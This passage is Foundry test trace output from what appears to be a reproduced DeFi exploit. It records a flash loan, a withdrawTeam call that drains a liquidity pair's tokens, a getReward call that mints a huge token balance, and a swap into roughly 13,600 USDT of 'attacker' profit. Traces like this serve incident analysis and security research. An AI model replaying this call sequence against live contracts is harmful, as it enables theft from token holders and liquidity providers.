    │   │   │   │   @ 0x3a82ca2c907593e5e55a17f1532a042e1c40cabc60d60373359337264a29bdf7: 0x0000000000000000000000000000000000000000000330f02775f570bca1abbb → 0x0000000000000000000000000000000000000000000330faece81dca0ff9ad1a
    │   │   │   │   @ 22: 0x00000000000000000000000000000000000000000000087a1dabb7ff1c65a961 → 0x000000000000000000000000000000000000000000000884e31de0586fbdaac0
    │   │   │   │   @ 0xc7183b2ebf8b980d3676ba2655740c37f0dc4722383889eb1e1363a36be594ca: 0x000000000000000000000000000000000000000000000136043d1a49040e859a → 0x0000000000000000000000000000000000000000000001378e28d6e80ff685cc
    │   │   │   └─ ← [Return] true
    │   │   ├─ [31852] 0x6666625Ab26131B490E7015333F97306F05Bf816::withdrawTeam(0x333896437125fF680f146f18c8A164Be831C4C71)
    │   │   │   ├─ [537] 0x333896437125fF680f146f18c8A164Be831C4C71::balanceOf(0x6666625Ab26131B490E7015333F97306F05Bf816) [staticcall]
    │   │   │   │   └─ ← [Return] 1893980243966583129219 [1.893e21]
    │   │   │   ├─ [25203] 0x333896437125fF680f146f18c8A164Be831C4C71::transfer(0xd9F90567162bCc6999265b1F1D5F77490C2dFeAa, 1893980243966583129219 [1.893e21])
    │   │   │   │   ├─ emit Transfer(from: 0x6666625Ab26131B490E7015333F97306F05Bf816, to: 0xd9F90567162bCc6999265b1F1D5F77490C2dFeAa, value: 1893980243966583129219 [1.893e21])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x06bf38f762a008fa6702bf132eb72f274bd27d55a32de5e4a6d19060fac7f693: 0 → 0x000000000000000000000000000000000000000000000066ac41852673dc4483
    │   │   │   │   │   @ 0x1ce5bde274458f7e91e5e265791663de38704dd6d7d562aa8c07334901af2c76: 0x000000000000000000000000000000000000000000000066ac41852673dc4483 → 0
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [0] 0xd9F90567162bCc6999265b1F1D5F77490C2dFeAa::fallback()
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x06bf38f762a008fa6702bf132eb72f274bd27d55a32de5e4a6d19060fac7f693: 0 → 0x000000000000000000000000000000000000000000000066ac41852673dc4483
    │   │   │   └─ ← [Stop]
    │   │   ├─ [3303] 0x333896437125fF680f146f18c8A164Be831C4C71::transfer(0x6666625Ab26131B490E7015333F97306F05Bf816, 13000000000000000 [1.3e16])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x6666625Ab26131B490E7015333F97306F05Bf816, value: 13000000000000000 [1.3e16])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000000d1e2685d2428c4483 → 0x00000000000000000000000000000000000000000000000d1df85663e477c483
    │   │   │   │   @ 0x1ce5bde274458f7e91e5e265791663de38704dd6d7d562aa8c07334901af2c76: 0 → 0x000000000000000000000000000000000000000000000000002e2f6e5e148000
    │   │   │   └─ ← [Return] true
    │   │   ├─ [33677] 0x6666625Ab26131B490E7015333F97306F05Bf816::getReward()
    │   │   │   ├─ [537] 0x333896437125fF680f146f18c8A164Be831C4C71::balanceOf(0x6666625Ab26131B490E7015333F97306F05Bf816) [staticcall]
    │   │   │   │   └─ ← [Return] 13000000000000000 [1.3e16]
    │   │   │   ├─ [537] 0x333896437125fF680f146f18c8A164Be831C4C71::balanceOf(0x6666625Ab26131B490E7015333F97306F05Bf816) [staticcall]
    │   │   │   │   └─ ← [Return] 13000000000000000 [1.3e16]
    │   │   │   ├─ [537] 0x333896437125fF680f146f18c8A164Be831C4C71::balanceOf(0x6666625Ab26131B490E7015333F97306F05Bf816) [staticcall]
    │   │   │   │   └─ ← [Return] 13000000000000000 [1.3e16]
    │   │   │   ├─ [537] 0x333896437125fF680f146f18c8A164Be831C4C71::balanceOf(0x6666625Ab26131B490E7015333F97306F05Bf816) [staticcall]
    │   │   │   │   └─ ← [Return] 13000000000000000 [1.3e16]
    │   │   │   ├─ [537] 0x333896437125fF680f146f18c8A164Be831C4C71::balanceOf(0x6666625Ab26131B490E7015333F97306F05Bf816) [staticcall]
    │   │   │   │   └─ ← [Return] 13000000000000000 [1.3e16]
    │   │   │   ├─ [537] 0x333896437125fF680f146f18c8A164Be831C4C71::balanceOf(0x6666625Ab26131B490E7015333F97306F05Bf816) [staticcall]
    │   │   │   │   └─ ← [Return] 13000000000000000 [1.3e16]
    │   │   │   ├─ emit Transfer(from: 0x6666625Ab26131B490E7015333F97306F05Bf816, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 3698480387757676166673474 [3.698e24])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 23: 0x00000000000000000000000000000000000000000000087a1dabb7ff1c65a961 → 0x000000000000000000000000000000000000000000000884e31de0586fbdaac0
    │   │   │   │   @ 0x3a82ca2c907593e5e55a17f1532a042e1c40cabc60d60373359337264a29bdf7: 0x0000000000000000000000000000000000000000000330faece81dca0ff9ad1a → 0x0000000000000000000000000000000000000000000021cbe6dfc118fe6138d8
    │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 2 → 0x000000000000000000000000000000000000000000030f2f06085cb111987444
    │   │   │   │   @ 0x755303852e9d37ba89f8d7ed329dac976d9b4e2d10c29c8c06b3e8c55a8b25d6: 0x000000000000000000000000000000000000000000000009595d2b6e77d44d3a → 0x000000000000000000000000000000000000000000000345e896d50a9694b6b2
    │   │   │   │   @ 24: 0x000000000000000000000000000000000000000000000009595d2b6e77d44d3a → 0x000000000000000000000000000000000000000000000345e896d50a9694b6b2
    │   │   │   └─ ← [Stop]
    │   │   ├─ [597] 0x6666625Ab26131B490E7015333F97306F05Bf816::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 3698480387757676166673476 [3.698e24]
    │   │   ├─ [41184] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokensSupportingFeeOnTransferTokens(3698480387757676166673476 [3.698e24], 0, [0x6666625Ab26131B490E7015333F97306F05Bf816, 0x55d398326f99059fF775485246999027B3197955], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1669017326 [1.669e9])
    │   │   │   ├─ [13013] 0x6666625Ab26131B490E7015333F97306F05Bf816::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x333896437125fF680f146f18c8A164Be831C4C71, 3698480387757676166673476 [3.698e24])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x6666625Ab26131B490E7015333F97306F05Bf816, value: 258893627143037331667143 [2.588e23])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0294a4C3E85d57Eb3bE568aaC17C4243d9e78beA, value: 36984803877576761666734 [3.698e22])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 73969607755153523333469 [7.396e22])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x333896437125fF680f146f18c8A164Be831C4C71, value: 3328632348981908550006128 [3.328e24])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 2: 0x00000000000000000000000000000000000000000007beaf0f1b6838a22af407 → 0x00000000000000000000000000000000000000000007af0528961eaff8db1aaa
    │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000030f2f06085cb111987444 → 2
    │   │   │   │   │   @ 0xc7183b2ebf8b980d3676ba2655740c37f0dc4722383889eb1e1363a36be594ca: 0x0000000000000000000000000000000000000000000001378e28d6e80ff685cc → 0x00000000000000000000000000000000000000000000090c816b7bac649e727a
    │   │   │   │   │   @ 0xced839f25180774fae80205f3a2b4d8c116859faa617c052e4bdf76ded81ee1e: 0x00000000000000000000000000000000000000000000531215f312f737fc3dab → 0x0000000000000000000000000000000000000000000313ef9b60fffcfb05731b
    │   │   │   │   │   @ 22: 0x000000000000000000000000000000000000000000000884e31de0586fbdaac0 → 0x000000000000000000000000000000000000000000003f5789f061b6c0552387
    │   │   │   │   │   @ 0x3a82ca2c907593e5e55a17f1532a042e1c40cabc60d60373359337264a29bdf7: 0x0000000000000000000000000000000000000000000021cbe6dfc118fe6138d8 → 0x00000000000000000000000000000000000000000000589e8db242774ef8b19f
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 135948450398780514053 [1.359e20]
    │   │   │   ├─ [893] 0x333896437125fF680f146f18c8A164Be831C4C71::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 15671064646577731607179 [1.567e22], 389735392138159824055298 [3.897e23], 1669017266 [1.669e9]
    │   │   │   ├─ [597] 0x6666625Ab26131B490E7015333F97306F05Bf816::balanceOf(0x333896437125fF680f146f18c8A164Be831C4C71) [staticcall]
    │   │   │   │   └─ ← [Return] 3720922390082163017347867 [3.72e24]
    │   │   │   ├─ [18427] 0x333896437125fF680f146f18c8A164Be831C4C71::swap(14025970184306771406844 [1.402e22], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   ├─ [3271] 0x55d398326f99059fF775485246999027B3197955::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 14025970184306771406844 [1.402e22])
    │   │   │   │   │   ├─ emit Transfer(from: 0x333896437125fF680f146f18c8A164Be831C4C71, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 14025970184306771406844 [1.402e22])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xec1ceac009edeb591bdbbf35678fc6b7cd037d306ecc307c734c43fbb24a2755: 0x00000000000000000000000000000000000000000000035187b5bb34181f1a8b → 0x0000000000000000000000000000000000000000000000592e459959f6d66a8f
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000000075ea9eb5a181fdf05 → 0x0000000000000000000000000000000000000000000002ffb81a0d3439688f01
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x333896437125fF680f146f18c8A164Be831C4C71) [staticcall]
    │   │   │   │   │   └─ ← [Return] 1645094462270960200335 [1.645e21]
    │   │   │   │   ├─ [597] 0x6666625Ab26131B490E7015333F97306F05Bf816::balanceOf(0x333896437125fF680f146f18c8A164Be831C4C71) [staticcall]
    │   │   │   │   │   └─ ← [Return] 3720922390082163017347867 [3.72e24]
    │   │   │   │   ├─ emit Sync(reserve0: 1645094462270960200335 [1.645e21], reserve1: 3720922390082163017347867 [3.72e24])
    │   │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 0, amount1In: 3331186997944003193292569 [3.331e24], amount0Out: 14025970184306771406844 [1.402e22], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 8: 0x637b2eb20000000052879912c30d086c2c0200000000035187b5bb34181f1a8b → 0x637b2eb20000000313ef9b60fffcfb05731b0000000000592e459959f6d66a8f
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 14161918634705551920897 [1.416e22]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [3271] 0x55d398326f99059fF775485246999027B3197955::transfer(0x26d0c625e5F5D6de034495fbDe1F6e9377185618, 500000000000000000000 [5e20])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x26d0c625e5F5D6de034495fbDe1F6e9377185618, value: 500000000000000000000 [5e20])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xf293ac4f2016c12f970d35cabe52ede86e940214b15208a1107f43cb9557cf4a: 0x00000000000000000000000000000000000000000000341dffed542f0849758b → 0x0000000000000000000000000000000000000000000034391ad22b11f799758b
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000002ffb81a0d3439688f01 → 0x0000000000000000000000000000000000000000000002e49d3536514a188f01
    │   │   │   └─ ← [Return] true
    │   │   ├─  storage changes:
    │   │   │   @ 12: 0 → 1
    │   │   │   @ 0x5f21d542f0332bb92b33ba73723f2cea8c276868d9605c67d4d389183322fec1: 0 → 0x00000000000000000000000000000000000000000000000d1e2685d2428c4483
    │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 2 → 0x000000000000000000000000000000000000000000030f2f06085cb111987444
    │   │   │   @ 0x1ce5bde274458f7e91e5e265791663de38704dd6d7d562aa8c07334901af2c76: 0 → 0x000000000000000000000000000000000000000000000000002e2f6e5e148000
    │   │   │   @ 0xced839f25180774fae80205f3a2b4d8c116859faa617c052e4bdf76ded81ee1e: 0x0000000000000000000000000000000000000000000052879912c30d086c2c02 → 0x00000000000000000000000000000000000000000000531215f312f737fc3dab
    │   │   └─ ← [Stop]
    │   ├─ [2531] 0x7130d2A12B9BCbFAe4f2634d864A1Ee1Ce3Ead9c::balanceOf(0x26d0c625e5F5D6de034495fbDe1F6e9377185618) [staticcall]
    │   │   └─ ← [Return] 5590398091313085704 [5.59e18]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x26d0c625e5F5D6de034495fbDe1F6e9377185618) [staticcall]
    │   │   └─ ← [Return] 246616454175969259386251 [2.466e23]
    │   ├─ [531] 0x7130d2A12B9BCbFAe4f2634d864A1Ee1Ce3Ead9c::balanceOf(0x26d0c625e5F5D6de034495fbDe1F6e9377185618) [staticcall]
    │   │   └─ ← [Return] 5590398091313085704 [5.59e18]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x26d0c625e5F5D6de034495fbDe1F6e9377185618) [staticcall]
    │   │   └─ ← [Return] 246616454175969259386251 [2.466e23]
    │   ├─ emit DODOFlashLoan(: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 0, : 500000000000000000000 [5e20])
    │   └─ ← [Stop]
    ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 13661918634705551920897 [1.366e22]
    ├─ emit log_named_decimal_uint(key: "[End] Attacker USDT balance after exploit", val: 13661918634705551920897 [1.366e22], decimals: 18)
    ├─  storage changes:
    │   @ 0xf403915216527d7a528c7e904a79169b63500427e62ef52c480a5df5568c5b18: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   @ 1: 0x0000000000000000010001010000000000000000000000000000000000000000 → 0x0000000000000000010000010000000000000000000000000000000000000000
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 16.64s (14.66s CPU time)

Ran 2 test suites in 16.67s (17.36s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
